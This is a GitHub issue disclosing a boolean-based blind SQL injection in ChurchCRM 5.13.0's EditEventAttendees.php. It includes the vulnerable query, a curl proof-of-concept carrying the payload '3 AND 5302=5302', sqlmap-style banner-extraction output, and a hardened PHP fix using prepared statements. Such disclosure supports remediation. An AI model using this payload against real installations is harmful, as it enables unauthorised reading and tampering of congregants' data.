Bug: (CVE-2025-1133) - SQL Injection in EID Parameter via EditEventAttendees.php #7252

Open
PenTeZtZMicZ opened this issue Feb 8, 2025 · 0 comments

Severity:

Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)

  • A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1133)

Authorization Required:

  • Administrator access required to view EditEventAttendees.php.

Description:

A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a boolean-based blind SQL Injection vulnerability in the EditEventAttendees functionality. The EID parameter is directly concatenated into an SQL query without proper sanitization, making it susceptible to SQL injection attacks. An attacker can manipulate the query, potentially leading to data exfiltration, modification, or deletion.

Exploiting the SQL Injection

Affected Asset:

  • http://<CHURCH_CRM>/EditEventAttendees.php

Vulnerable Source Code:

$EventID = $_POST['EID']; // from ListEvents button=Attendees

$sSQL = 'SELECT person_id, per_LastName FROM event_attend JOIN person_per ON person_per.per_id = event_attend.person_id WHERE event_id = ' . $EventID . ' ORDER by per_LastName, per_FirstName';

  • Vulnerability: The $EventID parameter is directly inserted into an SQL query without escaping or proper datatype specification, making it vulnerable to SQL Injection.

Steps to Reproduce:

  1. Navigate to the EditEventAttendees.php endpoint: http://<CHURCH_CRM>/EditEventAttendees.php
  2. Intercept the request using a tool like Burp Suite or manually craft a request.
  3. Modify the EID parameter with the following SQL Injection payload:
    1 AND 5302=5302
  4. Observe the response or potential changes in the query execution indicating that SQL Injection is possible.

Proof of Concept (PoC):

Exploiting Boolean-Based Blind SQL Injection

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <CHURCH_CRM>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 135' -H $'Origin: http://<CHURCH_CRM>' -H $'Connection: keep-alive' -H $'Referer: http://<CHURCH_CRM>/ListEvents.php' -H $'Upgrade-Insecure-Requests: 1' -H $'sec-ch-ua-platform: \"Windows\"' -H $'sec-ch-ua: \"Google Chrome\";v=\"117\", \"Chromium\";v=\"117\", \"Not=A?Brand\";v=\"24\"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0, i' \
    -b $'<CRM-COOKIE>' \
    --data-binary $'EID=3%20AND%205302=5302&EName=Summer%20Campalert(1)&EDesc=Summer%20Campalert(1)&EDate=June%2006%202017%2009:30%20am&Action=Attendees(1)' \
    $'http://<CHURCH_CRM>/EditEventAttendees.php'

Observed Response:

  • The request results in a successful response, confirming the SQL Injection vulnerability.

Automated Exploitation POC - Banner

---
Parameter: EID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EID=3 AND 5302=5302&Action=Attendees
---
[06:02:11] [INFO] the back-end DBMS is MySQL
[06:02:11] [INFO] fetching banner
[06:02:11] [INFO] retrieved: 22
[06:02:32] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
web server operating system: Linux Debian
web application technology: Apache 2.4.62, PHP 8.4.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '11.6.2-MariaDB-ubu2404'

Impact:

  • Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and event information.
  • Database Manipulation: Attackers can modify, delete, or corrupt important data.
  • Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.

Recommended Fix:

  • Use prepared statements (parameterized queries) to prevent SQL Injection.
  • Implement input validation to reject dangerous characters.
  • Apply principle of least privilege to database users to limit damage from SQL Injection.
  • Sanitize and validate the $EventID variable before using it in the SQL query. Ensure it is an integer or properly escaped.
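The following is an added example of the recommended fix applied to the query quoted in this report; it is not ChurchCRM's own code. It assumes a PDO connection in $pdo (the project's actual database layer may differ); the table and column names are the ones from the vulnerable snippet above.

```php
<?php
// Added example (not ChurchCRM's own code): hardened replacement for the
// EditEventAttendees.php query quoted in the report. Assumes a PDO
// connection in $pdo; table and column names come from the report.

/**
 * Return the EID POST parameter as a positive integer, or null if it is
 * anything else. A value such as "3 AND 5302=5302" is rejected here,
 * before any SQL text is built.
 */
function readEventId(array $post): ?int
{
    if (!isset($post['EID'])) {
        return null;
    }
    // FILTER_VALIDATE_INT refuses anything that is not a whole decimal
    // number; min_range keeps out 0 and negative ids.
    $id = filter_var($post['EID'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $id === false ? null : $id;
}

/**
 * Fetch attendees for one event with a parameterised query. The event id
 * reaches MariaDB as a bound integer, never as part of the SQL string,
 * so the boolean-based blind injection described above cannot occur.
 */
function fetchAttendees(PDO $pdo, int $eventId): array
{
    $sql = 'SELECT person_id, per_LastName'
         . ' FROM event_attend'
         . ' JOIN person_per ON person_per.per_id = event_attend.person_id'
         . ' WHERE event_id = :eid'
         . ' ORDER BY per_LastName, per_FirstName';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':eid', $eventId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Reject the request outright when EID is not a valid integer.
$eventId = readEventId($_POST);
if ($eventId === null) {
    http_response_code(400);
    exit('Invalid event id');
}
$attendees = fetchAttendees($pdo, $eventId);
```

Setting PDO::ATTR_EMULATE_PREPARES to false on the connection makes the server, not the client library, perform the parameter binding.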

Environment:

  • Application: ChurchCRM 5.13.0
  • Tested on: Provided Docker in release